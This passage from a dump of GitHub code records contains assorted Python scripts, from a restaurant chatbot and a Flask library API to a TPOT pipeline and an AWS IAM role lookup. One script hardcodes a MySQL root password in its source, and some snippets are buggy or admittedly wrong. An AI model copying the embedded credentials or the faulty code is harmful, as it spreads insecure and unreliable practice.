what attribute you are uncomfortable with ? 
[Cuisine / Location / Price]\")\n confirmValue2 = self.bslvChatBotObj.speech_recognition()\n if confirmValue2 is not None:\n if \"cuisine\" in confirmValue2.lower() and \"location\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n print(\"Line 106\")\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n elif \"cuisine\" in confirmValue2.lower() and \"location\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_LOCATION = False\n elif \"cuisine\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n self.BOOLEAN_PRICE = False\n elif \"location\" in confirmValue2.lower() and \"price\" in confirmValue2.lower():\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n elif \"cuisine\" in confirmValue2.lower():\n self.BOOLEAN_CUISINE = False\n elif \"location\" in confirmValue2.lower():\n self.BOOLEAN_LOCATION = False\n elif \"price\" in confirmValue2.lower():\n self.BOOLEAN_PRICE = False\n else:\n self.handle_negatives()\n return self.fix_choice()\n else:\n self.handle_negatives()\n\n def call_speech(self):\n confirmValue = None\n while confirmValue is None or (\"yes\" not in confirmValue.lower() and \"no\" not in confirmValue.lower()):\n confirmValue = self.bslvChatBotObj.speech_recognition()\n if \"yes\" in confirmValue.lower():\n return True\n elif \"no\" in confirmValue.lower():\n return self.handle_negatives()\n\n\n def fix_choice(self, invalid_choice=False):\n final_return_value =\"\"\n if invalid_choice == \"invalid_choice\":\n question = random.choice(self.STARTUP_FILTER['STANDARD_RESPONSE'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['STANDARD_RESPONSE'])\n if self.BOOLEAN_PRICE and self.BOOLEAN_LOCATION and self.BOOLEAN_CUISINE:\n print(\"Just to confirm once, You preferred \" + self.CUISINE_VALUE + \" for Cuisine , \" + self.PRICE_VALUE + \" for Price and \" + self.LOCATION_VALUE + \" for Location., Is this correct ?. [Yes / No]\")\n ret = self.call_speech()\n if ret == True:\n yelpObj = GetAPIResults()\n self.resultDict,self.analyzedSentimentDict = yelpObj.get_results(self.LOCATION_VALUE.lower(), self.PRICE_VALUE, self.CUISINE_VALUE.lower())\n if self.resultDict is None or len(self.resultDict) == 0:\n self.BOOLEAN_LOCATION = False\n self.BOOLEAN_PRICE = False\n self.BOOLEAN_CUISINE = False\n self.CUISINE_VALUE = \"\"\n self.PRICE_VALUE = \"\"\n self.LOCATION_VALUE = \"\"\n print(\"Sorry, No results found for the given preferences. Let me give another try\")\n return self.temp_crf(\"I want to eat\")\n print()\n print(\"################# Here you Go #################\")\n print()\n counter = 0\n keylist = [\"Name: \",\"URL: \",\"Address: \",\"Overall Review: \"]\n for key,value in self.resultDict.items():\n if counter < 3:\n i=0\n counter_2 = 0\n print(\"---------------------------------\")\n for val in value:\n if counter_2 == 3:\n if val in self.analyzedSentimentDict:\n review = self.analyzedSentimentDict[val]\n print(keylist[i],review)\n else:\n print(keylist[i],val)\n i=i+1\n counter_2+=1\n print(\"---------------------------------\")\n counter = counter+1\n print()\n return \"!!!!!!!!!!!!!!!!!!!!!! 
Bon appetit !!!!!!!!!!!!!!!!!!!!!!\"\n else:\n return ret\n elif self.BOOLEAN_CUISINE and self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['LOCATION_CUISINE_GIVEN'])\n\n elif self.BOOLEAN_PRICE and self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['PRICE_LOCATION_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_LOCATION_GIVEN'])\n\n elif self.BOOLEAN_CUISINE and self.BOOLEAN_PRICE:\n question = random.choice(self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_CUISINE_GIVEN'])\n\n elif self.BOOLEAN_PRICE:\n question = random.choice(self.STARTUP_FILTER['PRICE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['PRICE_GIVEN'])\n\n elif self.BOOLEAN_CUISINE:\n question = random.choice(self.STARTUP_FILTER['CUISINE_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['CUISINE_GIVEN'])\n\n elif self.BOOLEAN_LOCATION:\n question = random.choice(self.STARTUP_FILTER['LOCATION_GIVEN'])\n if question is not None:\n final_return_value += question\n else:\n final_return_value += random.choice(self.STARTUP_FILTER['LOCATION_GIVEN'])\n return final_return_value\n\nif __name__ == '__main__':\n choice = Fix_choice()\n while True:\n return_value = choice.bslvChatBotObj.speech_recognition()\n if return_value is not None:\n print(\"ChatBot: \"+str(choice.temp_crf(return_value)))\n if choice.BOOLEAN_CUISINE and choice.BOOLEAN_LOCATION and choice.BOOLEAN_PRICE:\n break","repo_name":"louisarokiaraj/BSLVChatbot","sub_path":"speech_recognition/BSLVChatBot.py","file_name":"BSLVChatBot.py","file_ext":"py","file_size_in_byte":12465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74542352053","text":"import logging\n\nfrom flask import g\nfrom flask_restful import Resource, reqparse\n\nfrom App.apis.api_constant import book_error, data_response\nfrom App.apis.library.utils.utils_request import get_book, check_book, get_image\nfrom App.apis.new_login.utils.utils_cache import new_login_required\nfrom App.apis.new_login.utils.utils_data_processing import marshal_library_history_list, marshal_library_list\nfrom App.apis.new_login.utils.utils_request import get_library_history_list, get_library_favorite, get_library_list\n\nparse_library = reqparse.RequestParser()\nparse_library.add_argument('book', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_library.add_argument('page', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_library.add_argument('row', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_shelf = reqparse.RequestParser()\nparse_shelf.add_argument('id', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_image = reqparse.RequestParser()\nparse_image.add_argument('isbn', type=str, help='请提交正确的参数Key', required=True, location=['args'])\nparse_image.add_argument('title', type=str, help='请提交正确的参数Key', required=True, location=['args'])\n\nparse_list = 
reqparse.RequestParser()\nparse_list.add_argument(\"page\", type=str, help='请输入页码', required=True, location=['json'])\nparse_list.add_argument(\"rows\", type=str, help='请输入大小', required=True, location=['json'])\n\n\nclass Library(Resource):\n    def get(self):\n        args = parse_library.parse_args()\n        book_name = args.get('book')\n        page = args.get('page')\n        row = args.get('row')\n        try:\n            data = get_book(book_name, page, row)\n            if data:\n                return {\n                    \"status\": 200,\n                    \"msg\": \"抓取成功\",\n                    \"data\": data\n                }\n        except Exception as e:\n            logging.info(e)\n            return book_error\n\n\nclass OnShelf(Resource):\n    def get(self):\n        args = parse_shelf.parse_args()\n        id = args.get('id')\n        try:\n            data = check_book(id)\n            return {\n                \"status\": 200,\n                \"msg\": \"抓取成功\",\n                \"data\": data\n            }\n        except Exception as e:\n            logging.info(e)\n            return book_error\n\n\nclass BookImage(Resource):\n    def get(self):\n        args = parse_image.parse_args()\n        isbn = args.get('isbn')\n        title = args.get('title')\n        data = get_image(isbn, title)\n        try:\n            return {\n                \"status\": 200,\n                \"msg\": \"抓取成功\",\n                \"data\": data\n            }\n        except Exception as e:\n            logging.info(e)\n            return book_error\n\n\nclass libraryList(Resource):\n    @new_login_required\n    def get(self):\n        args = parse_list.parse_args()\n        page = args.get('page')\n        rows = args.get('rows')\n        try:\n            if g.is_cook:\n                data = get_library_list(g.lib_cook, page, rows)\n                msg = marshal_library_list(data)\n                return data_response(200, '请求成功', msg)\n            else:\n                return data_response(500, 'Cookie错误', '')\n        except Exception as e:\n            logging.info(e)\n            return data_response(500, e, '')\n\n\nclass libraryHistoryList(Resource):\n    @new_login_required\n    def get(self):\n        args = parse_list.parse_args()\n        page = args.get('page')\n        rows = args.get('rows')\n        try:\n            if g.is_cook:\n                data = get_library_history_list(g.lib_cook, page, rows)\n                msg = marshal_library_history_list(data)\n                return data_response(200, '请求成功', msg)\n            else:\n                return data_response(500, 'Cookie错误', '')\n        except Exception as e:\n            logging.info(e)\n            return data_response(500, e, '')\n\n\nclass libraryFavorite(Resource):\n    @new_login_required\n    def get(self):\n        args = parse_list.parse_args()\n        page = args.get('page')\n        rows = args.get('rows')\n        try:\n            if g.is_cook:\n                data = get_library_favorite(g.lib_cook, page, rows)\n                return data_response(200, '请求成功', data)\n            else:\n                return data_response(500, 'Cookie错误', '')\n        except Exception as e:\n            logging.info(e)\n            return data_response(500, e, '')\n\n\n","repo_name":"boopo/boopo-kxz","sub_path":"App/apis/library/library_api.py","file_name":"library_api.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"29377530662","text":"\"\"\"\nGiven an integer array nums, find the contiguous subarray (containing at least\none element) that has the largest sum, and return that sum.\n\nExample:\n\nInput: [-2,1,-3,4,-1,2,1,-5,4]\nOutput: 6\nExplanation: the contiguous subarray [4,-1,2,1] has the largest sum, 6.\nFollow-up:\n\nIf you have already implemented the O(n) solution, try the subtler\ndivide-and-conquer approach.\n\nSource: LeetCode (力扣)\nLink: https://leetcode-cn.com/problems/maximum-subarray\nCopyright belongs to LeetCode; contact them for authorization before any\ncommercial reuse, and credit the source for non-commercial reuse.\n\"\"\"\n\n\nclass Solution:\n    def maxSubArray(self, nums):\n        nums_sum = nums[0]\n        max_nums_sum = nums[0]\n        for i in range(1,len(nums)):\n            if nums_sum<0:\n                nums_sum = nums[i]\n            else:\n                nums_sum = nums_sum + nums[i]\n            max_nums_sum = max(max_nums_sum, nums_sum)\n        return max_nums_sum\n\n\nif __name__ == \"__main__\":\n    solu = Solution()\n    nums = [-2,1,-3,4,-1,2,1,-5,4]\n    
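# Expected output for this example input: 6 (the subarray [4,-1,2,1]).\n    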
print(solu.maxSubArray(nums))\n\n\n\n","repo_name":"996426872/python_q_a","sub_path":"算法与数据结构/动态规划/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17503644782","text":"import win32con\nimport win32api\nimport win32gui\nimport ctypes\nimport ctypes.wintypes\n\nif __name__ == \"__main__\":\n import threading\n\n\nclass HARDWARESTRUCT(ctypes.Structure):\n _fields_ = [\n ('dbch_size', ctypes.wintypes.DWORD),\n ('dbch_devicetype', ctypes.wintypes.DWORD),\n ('dbch_reserved', ctypes.wintypes.DWORD)\n ]\n\nPHARDWARESTRUCT = ctypes.POINTER(HARDWARESTRUCT)\n\n\nclass Listener(object):\n\n def __init__(self):\n mapping = {\n win32con.WM_DEVICECHANGE: self.event_handler\n }\n wc = win32gui.WNDCLASS()\n wc.lpfnWndProc = mapping\n wc.lpszClassName = 'MyWindowClass'\n hinst = wc.hInstance = win32api.GetModuleHandle(None)\n classAtom = win32gui.RegisterClass(wc)\n self.hwnd = win32gui.CreateWindow(\n classAtom,\n \"\",\n 0,\n 0,\n 0,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 0,\n 0,\n hinst,\n None\n )\n\n def device_state_changed(self, connected=True):\n raise NotImplementedError\n\n def start_listening(self):\n win32gui.PumpMessages()\n\n def event_handler(self, hwnd, uMsg, wParam, lParam):\n if wParam == 0x8000 or wParam == 0x8004:\n data = ctypes.cast(lParam, PHARDWARESTRUCT)\n devicetype = data.contents.dbch_devicetype\n\n if devicetype == 0x2:\n # print \"Device changed :)\"\n self.device_state_changed(\"add\" if wParam == 0x8000 else \"remove\")\n\ndef listen():\n l = Listener()\n l.start_listening()\n\nif __name__ == \"__main__\":\n t = threading.Thread(target=listen)\n t.start()","repo_name":"matthewelse/lmtools","sub_path":"lmtools/lmtoolswin/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"71574574133","text":"import solver\nfrom matplotlib import pyplot\nfrom matplotlib import rc\n\nif __name__ == '__main__':\n # rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n rc('text', usetex=True)\n\n ode = input(\"ode \")\n x0 = float(input(\"x0 \"))\n y0 = float(input(\"y(x0) \"))\n xn = float(input(\"xn \"))\n xk = float(input(\"xk \"))\n print(solver.toRpn(ode))\n data = solver.rungekutta(ode, x0, y0, xn, xk)\n\n print(data)\n\n x = []\n y = []\n\n for d in data:\n x.append(float(d['x']))\n y.append(float(d['y']))\n\n pyplot.title(\"$\\\\displaystyle y\\'=\" + solver.formula_buitifier(ode) + \"$ solution\", fontsize=16)\n pyplot.plot(x, y)\n pyplot.show()\n","repo_name":"alexbatashev/rungekutta","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21504592167","text":"#Mohammed Abdulkadir\n#CS491 Adv python\n#HW_W12\n\nfrom __future__ import print_function\nfrom bs4 import BeautifulSoup\nimport requests\n\nclass fact_directory(object):\n\n def __init__(self, url=\"\",page=\"\",bsoup=\"\"):\n self.url = url\n self.page = page\n self.bsoup = bsoup\n\n def connect(self):\n self.page = requests.get(self.url)\n\n def get_staffinfo(self):\n #this function will scrape the link from the faculty directory\n bsoup = BeautifulSoup(self.page.text, 'html.parser')\n\n #finds all 'div' tags with faculty info\n directory_array = bsoup.find_all('div', class_='people-wrapper')\n 
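# Added note: the three find_all calls below are collected for completeness,\n        # but only directory_array is consumed by the loop that follows.\n        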
directory_array2 = bsoup.find_all('div', class_='department')\n        directory_array3 = bsoup.find_all('div', class_='person-contact')\n        directory_array4 = bsoup.find_all('div', class_='summary')\n        \n        #if faculty is found, pull information from website\n        for i in directory_array:\n            name = i.find('h3').text\n            position = i.find('h4').text\n            info = i.find('p').text\n            #find() expects a tag name, so look up the anchor tag and read its href attribute\n            anchor = i.find('a')\n            web = anchor.get('href') if anchor else 'N/A'\n            print(\"Name:\", name)\n            print(\"Position:\", position)\n            print(info)\n            print(\"Website:\", web)\n            print(\"**********************************************************\", sep=\"\")\n\n    def null_filler(self, fun_arr):\n        #check that every field is available; fill missing ones with N/A\n\n        data = []\n        for p_row in fun_arr:\n            output = p_row.text.encode('utf-8').strip()\n            if not output:\n                output = \"N/A\"\n            data.append(output)\n        return data\n\nif __name__ == \"__main__\":\n    #faculty page from class\n    start = fact_directory(\"http://cs.siu.edu/faculty-staff/continuing_faculty.php\")\n    #function connect() from class fact_directory\n    start.connect()\n    #function get_staffinfo() from class fact_directory\n    start.get_staffinfo()\n","repo_name":"Andimoh/CS491_Advanced-Python","sub_path":"hw_w12/abdulkadir_fac_directory.py","file_name":"abdulkadir_fac_directory.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10363644951","text":"import subprocess\r\n\r\ndef search_role():\r\n    with open('instance_profiles.txt', 'r') as f:\r\n        in_pr = [line.replace('\\n', '') for line in f]\r\n    \r\n    for i in in_pr:\r\n        try:\r\n            # subprocess.call returns the CLI's exit code; the role names themselves\r\n            # are printed to stdout by the aws command\r\n            role_res = subprocess.call(['aws', 'iam', 'get-instance-profile', '--instance-profile-name', f'{i}', '--query', \\\r\n                'InstanceProfile.Roles[].RoleName[]', '--output', 'text']) \r\n        except Exception as e:\r\n            print(e)\r\n    \r\nif __name__ == \"__main__\":\r\n    search_role()\r\n","repo_name":"ekhanu101/SSM-policy-scanner","sub_path":"get_roles.py","file_name":"get_roles.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10423825802","text":"\"\"\"\nhttps://codingcompetitions.withgoogle.com/codejam/round/000000000019fef2/00000000002d5b62\nNo idea what went wrong here. 
Something's giving a non-minimal answer, or saying\nit's impossible when it's not.\n\"\"\"\n\n\ndef expand(x):\n    if x == 0:\n        return ((0, 0),)\n    digits = \"{0:b}\".format(abs(x))\n    d = len(digits)\n    solns = []\n\n    solns.append((abs(x), 0) if x > 0 else (0, abs(x)))\n\n    for i in range(0, 30):\n        candidate_diff = abs(abs(x) - 2 ** i)\n        # Share a digit?\n        # print(\"{0:b} {1:b}\".format(candidate_diff, 2 ** i))\n        # print(2 ** i, candidate_diff)\n        solns.append((2 ** i, candidate_diff) if x > 0 else (candidate_diff, 2 ** i))\n\n    # for a, b in solns:\n    #     assert a - b == x, (a, b, x)\n\n    return ((a, b) for a, b in solns if a - b == x)\n    # return solns\n\n\ndef to_str(p1, n1, p2, n2):\n    ns = \"{0:b}\".format(p2)\n    ss = \"{0:b}\".format(n2)\n    es = \"{0:b}\".format(p1)\n    ws = \"{0:b}\".format(n1)\n    digits = max(len(dir_) for dir_ in (ns, es, ss, ws))\n    while len(ns) < digits:\n        ns = \"0\" + ns\n    while len(ss) < digits:\n        ss = \"0\" + ss\n    while len(es) < digits:\n        es = \"0\" + es\n    while len(ws) < digits:\n        ws = \"0\" + ws\n\n    # raise Exception(ns, es, ss, ws)\n    # print(digits)\n    str_ = []\n    for i in range(-1, -digits - 1, -1):\n        # print(i)\n        if ns[i] == \"1\":\n            str_.append(\"N\")\n        elif ss[i] == \"1\":\n            str_.append(\"S\")\n        elif es[i] == \"1\":\n            str_.append(\"E\")\n        elif ws[i] == \"1\":  # elif, not a bare if: each step moves in exactly one direction\n            str_.append(\"W\")\n    # print(str_)\n    return \"\".join(str_)\n\n\ndef solve_case(x, y):\n    combs = [(a, b) for a in expand(x) for b in expand(y)]\n\n    min_sol = None\n    for ((p1, n1), (p2, n2)) in combs:\n        if all(c == \"1\" for c in \"{0:b}\".format(p1 + p2 + n1 + n2)):\n            # It's a soln.\n            sol = to_str(p1, n1, p2, n2)\n            # check(sol, x, y)\n            if not min_sol or len(sol) < len(min_sol):\n                # It's minimal\n                min_sol = sol\n\n    return min_sol or \"IMPOSSIBLE\"\n\n    # print(\"{0:b} {1:b} {2:b} {3:b}\".format(*min_sol))\n\n\ndef check(str_, realx, realy):\n    x, y = (0, 0)\n    if str_ == \"IMPOSSIBLE\":\n        return\n    for i, c in enumerate(str_):\n        if c == \"N\":\n            y = y + 2 ** i\n        if c == \"S\":\n            y = y - 2 ** i\n        if c == \"E\":\n            x = x + 2 ** i\n        if c == \"W\":\n            x = x - 2 ** i\n    assert (x, y) == (realx, realy), (x, y)\n\n\ndef run():\n    cases = int(input())\n    for i in range(1, cases + 1):\n        x, y = (int(x) for x in input().split(\" \"))\n        soln = solve_case(x, y)\n        print(\"Case #{}: {}\".format(i, soln), flush=True)\n        check(soln, x, y)\n\n\nif __name__ == \"__main__\":\n    run()\n","repo_name":"dprgarner/codejam","sub_path":"2020/round_1b/expogo.py","file_name":"expogo.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12880677945","text":"#List Comprehension\n\nnum = [1, 2, 3, 4]\nnew_list = [n+1 for n in num]\nprint(new_list)\n\nnum_2 = [68, 419]\nnew_list_2 = [n+1 for n in num_2]\nprint(new_list_2)\n\nname = 'Okabe'\nnew_name = [n for n in name]\nprint(new_name)\n\nnew_double = [n*2 for n in range(1, 5)]\nprint(new_double)\n\nthe_names = ['Okarinnn', 'Shizume', 'Daru', 'Maho', 'Mikasa', 'Eren Yeger']\nnew_names = [name for name in the_names if len(name)<9]\nprint(new_names)\n\ncap_names = [name.upper() for name in the_names if len(name)>5]\nprint(cap_names)","repo_name":"manthanoice/Python-100","sub_path":"Day-26/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36433820387","text":"# -*- coding: UTF-8 -*-\nimport pandas as pd\nimport csv\nimport pymysql\n\nuser = \"root\"\npassword = \"928457\"\n\ndef score(ch):\n    
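\"\"\"Map a letter grade to a numeric score: A -> 95, B -> 85, C -> 75, anything else -> 65.\"\"\"\n    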
if ch == 'A':\n        return 95\n    elif ch == 'B':\n        return 85\n    elif ch == 'C':\n        return 75\n    else:\n        return 65\n\ndef func():\n    quality = []\n    lecture = []\n    answer = []\n    # data before preprocessing\n    #data = pd.read_csv('One/score.csv')\n    conn = pymysql.connect(host=\"localhost\", user=user, password=password, database=\"machine\")\n    data = pd.read_sql(\"select * from score\",con=conn)\n    desc = data.describe()\n    data1 = []\n    for i, row in desc.iterrows():\n        data1.append({'num':str(row[0]), 'name':str(row[1]), 'ppt':str(row[2]),\n                      'jiangjie':str(row[3]), 'answer':str(row[4]), 'class':str(row[5])})\n\n    # run the preprocessing\n    with open(r'One/score.csv', encoding='UTF-8') as f:\n        f_csv = csv.reader(f)\n        samples = []\n        rowCount = 0\n        for row in f_csv:\n            rowCount += 1\n            if rowCount >= 3:\n                isBlank = 0\n                sample = []\n                for i in range(len(row)):\n                    if row[i] == '':\n                        isBlank = 1\n                    if i <= 4 and i >= 2:\n                        sample.append(score(row[i]))\n                    elif i == (len(row) - 1) and row[i] != '':\n                        sample.append(row[i].split(':')[1])\n                    else:\n                        sample.append(row[i])\n                if isBlank == 0:\n                    samples.append(sample)\n                    # print(sample)\n                    quality.append(sample[2])\n                    lecture.append(sample[3])\n                    answer.append(sample[4])\n    # data after preprocessing\n    dd = pd.DataFrame(samples)\n    desc2 = dd.describe()\n    data2 = []\n    for i in range(len(desc2)):\n        data2.append({'one': str(desc2.iloc[i, 0]), 'two': str(desc2.iloc[i, 1]),\n                      'three': str(desc2.iloc[i, 2])})\n    # tally the grade counts\n    quality = [quality.count(95), quality.count(85), quality.count(75), quality.count(65)]\n    lecture = [lecture.count(95), lecture.count(85), lecture.count(75), lecture.count(65)]\n    answer = [answer.count(95), answer.count(85), answer.count(75), answer.count(65)]\n    return (quality,lecture,answer,data1,data2)\n\n\n\n\n\n\n\n","repo_name":"wangliang1998/MLVP","sub_path":"back/One/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21164487303","text":"import time\n\nimport requests\n\n# Weather info endpoint, captured from the browser console (F12); many people say it is\n# free and unlimited, so just use it for now (city_id must be supplied by the caller;\n# see the link at the bottom for the full id list)\ntime_st = round(time.time())\nurl = f\"http://d1.weather.com.cn/sk_2d/{city_id}.html?_={time_st}\"\n\n# Without this header the request returns 403; diffing the request headers showed\n# this Referer parameter was the missing piece\ntemp_r = requests.get(url,headers={\"Referer\":\"https://m.weather.com.cn\"}) \ntemp_r.encoding = \"utf-8\"\n\nprint(temp_r.text)\n\n# City ids can be fetched from the link below; it ships a sql file you can tweak and\n# load straight into a database\n# You can also use the json data inside directly\n# http://81.70.62.148/weather_api.zip\n","repo_name":"ichengi/LittleScript","sub_path":"apicol/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2258123581","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import ElasticNetCV, RidgeCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.preprocessing import Normalizer\nfrom tpot.builtins import StackingEstimator\nfrom tpot.export_utils import set_param_recursive\nfrom data_info import *\nfrom preprocessing_helpers import *\n\n\nnew_sj_norm = [\n    'precipitation_amt_mm',\n    'reanalysis_air_temp_k',\n    'reanalysis_avg_temp_k',\n    'reanalysis_max_air_temp_k',\n    'reanalysis_min_air_temp_k',\n    'reanalysis_precip_amt_kg_per_m2',\n    'reanalysis_relative_humidity_percent',\n    'reanalysis_sat_precip_amt_mm',\n    'station_avg_temp_c',\n    'station_max_temp_c',\n    'station_min_temp_c',\n    'station_precip_mm'\n]\nnew_sj_scale = [\n    'weekofyear',\n]\n\nextra_sj_cols = 
[\n]\n\nnew_sj_cols = [LABEL_COLUMN] + CATEGORICAL_COLUMNS + new_sj_norm + new_sj_scale + extra_sj_cols + [DATETIME_COLUMN]\nnew_sj_cols_no_label = CATEGORICAL_COLUMNS + new_sj_norm + new_sj_scale + extra_sj_cols + [DATETIME_COLUMN]\nsj_datasets, sj_norm_scale = generate_lstm_data(\n test_file,\n single_step=True,\n history_size=24,\n cols=new_sj_cols_no_label,\n norm_cols=new_sj_norm,\n scale_cols=new_sj_scale,\n extra_columns=extra_sj_cols,\n prepend_with_file=train_file,\n train_frac=1.0\n)\nsj_train_x, sj_train_y = sj_datasets[0][0]\nsj_train_x = sj_train_x.reshape(sj_train_x.shape[0], sj_train_x.shape[1] * sj_train_x.shape[2])\nprint(np.size(sj_train_x))\n# NOTE: Make sure that the outcome column is labeled 'target' in the data file\n# tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)\n# features = tpot_data.drop('target', axis=1)\ntraining_features, testing_features, training_target, testing_target = \\\n train_test_split(sj_train_x, sj_train_y, random_state=42)\nprint(np.size(training_features))\n\n# Average CV score on the training set was: -18.091824133868496\nexported_pipeline = make_pipeline(\n Normalizer(norm=\"l2\"),\n StackingEstimator(estimator=ElasticNetCV(l1_ratio=0.25, tol=0.01)),\n StackingEstimator(estimator=RidgeCV()),\n RandomForestRegressor(bootstrap=True, max_features=0.4, min_samples_leaf=6, min_samples_split=14, n_estimators=100)\n)\n# Fix random state for all the steps in exported pipeline\nset_param_recursive(exported_pipeline.steps, 'random_state', 42)\n\nexported_pipeline.fit(training_features, training_target)\nresults = exported_pipeline.predict(testing_features)\n\n\npreds = np.concatenate((results, np.zeros(156)), axis=None)\nexport_test_to_csv(predictions=results,path=test_file, prefix='rf')","repo_name":"burnpiro/dengai-predicting-disease-spread","sub_path":"tpot_denga_pipeline3.py","file_name":"tpot_denga_pipeline3.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27323893202","text":"import os\nfrom pathlib import Path\n\ndef show_env(mod_name):\n django_settings = Path(os.environ['DJANGO_SETTINGS_MODULE']).name\n projroot = str(Path(__file__).parent.parent.parent)\n p = Path(os.environ.get('PVZDLIB_CONFIG_MODULE', 'DEFAULT'))\n pvzdlib_settings = str(p)[len(projroot)+1:] # reduce to path relative to project root\n print(f\"\\ntestenv/{mod_name}: DJANGO_SETTINGS_MODULE={django_settings}; \"\n f\"PVZDLIB_CONFIG_MODULE={pvzdlib_settings}\")\n\n","repo_name":"identinetics/PVZDweb","sub_path":"common/show_env.py","file_name":"show_env.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16008389373","text":"from collections import deque\nfrom statistics import mean\nfrom collections import deque\nimport math\n\nimport numpy as np\n\n\nclass PositionCalculator:\n LEFT_EYE_INDEX = 0\n RIGHT_EYE_INDEX = 1\n REAL_IPD = 6.5 # cm. 
Physical distance between my pupils\n\n    RELATIVE_EYE_POSITION_OFFSET = (\n        -0.5\n    )  # This is to ensure that relative coords origin is at center of image instead of top-left.\n\n    def __init__(self):\n        self.xPositionQueue = deque([0] * 10, 10)\n        self.yPositionQueue = deque([0] * 10, 10)\n        self.zPositionQueue = deque([0] * 10, 10)\n\n        self.leftEyeXQueue = deque([], 3)\n        self.leftEyeYQueue = deque([], 3)\n        self.rightEyeXQueue = deque([], 3)\n        self.rightEyeYQueue = deque([], 3)\n\n        self.allSmoothQs = [\n            self.leftEyeXQueue,\n            self.leftEyeYQueue,\n            self.rightEyeXQueue,\n            self.rightEyeYQueue,\n        ]\n\n    def convertBoundingBoxWidthToDistance(self, width):  # distance in CM!\n        CENTIMETERS_PER_INCH = 2.54\n        a, b, c, d = -0.000003372072338, 0.002878979776, -0.8792663751, 114.0018076\n        distance = a * pow(width, 3) + b * pow(width, 2) + c * width + d\n        return distance * CENTIMETERS_PER_INCH\n\n    def calcIPD(self, detection, image_height, image_width):\n        \"calcs the virtual (pixel) IPD; the real IPD is REAL_IPD, 6.5 cm\"\n        if not detection or not detection.location_data:\n            return -1\n\n        left_pt = detection.location_data.relative_keypoints[self.LEFT_EYE_INDEX]\n        right_pt = detection.location_data.relative_keypoints[self.RIGHT_EYE_INDEX]\n\n        xdistsq = pow(left_pt.x * image_width - right_pt.x * image_width, 2)\n        ydistsq = pow(left_pt.y * image_height - right_pt.y * image_height, 2)\n\n        dist = math.sqrt(xdistsq + ydistsq)\n        return math.floor(dist)\n\n    def calcXYPosition(self, detection, image_height, image_width, virt_ipd):\n        \"\"\"\n        Calcs the real world X and Y coordinates of the point located midway between eyes\n        Does not account for \"fish-eye\" effect of camera lens. There will be more error the further away\n        we move from the center of the image.\n        \"\"\"\n\n        left_eye_pt, right_eye_pt = self.getRelativeEyePosition(detection)\n\n        # true division here: the relative coords are fractions below 1, so floor\n        # division by 2 would always give 0 and collapse the midpoint onto the left eye\n        mid_x = left_eye_pt.x + abs(right_eye_pt.x - left_eye_pt.x) / 2\n        mid_y = left_eye_pt.y + abs(right_eye_pt.y - left_eye_pt.y) / 2\n\n        mid_x_px = mid_x * image_width\n        mid_y_px = mid_y * image_height\n\n       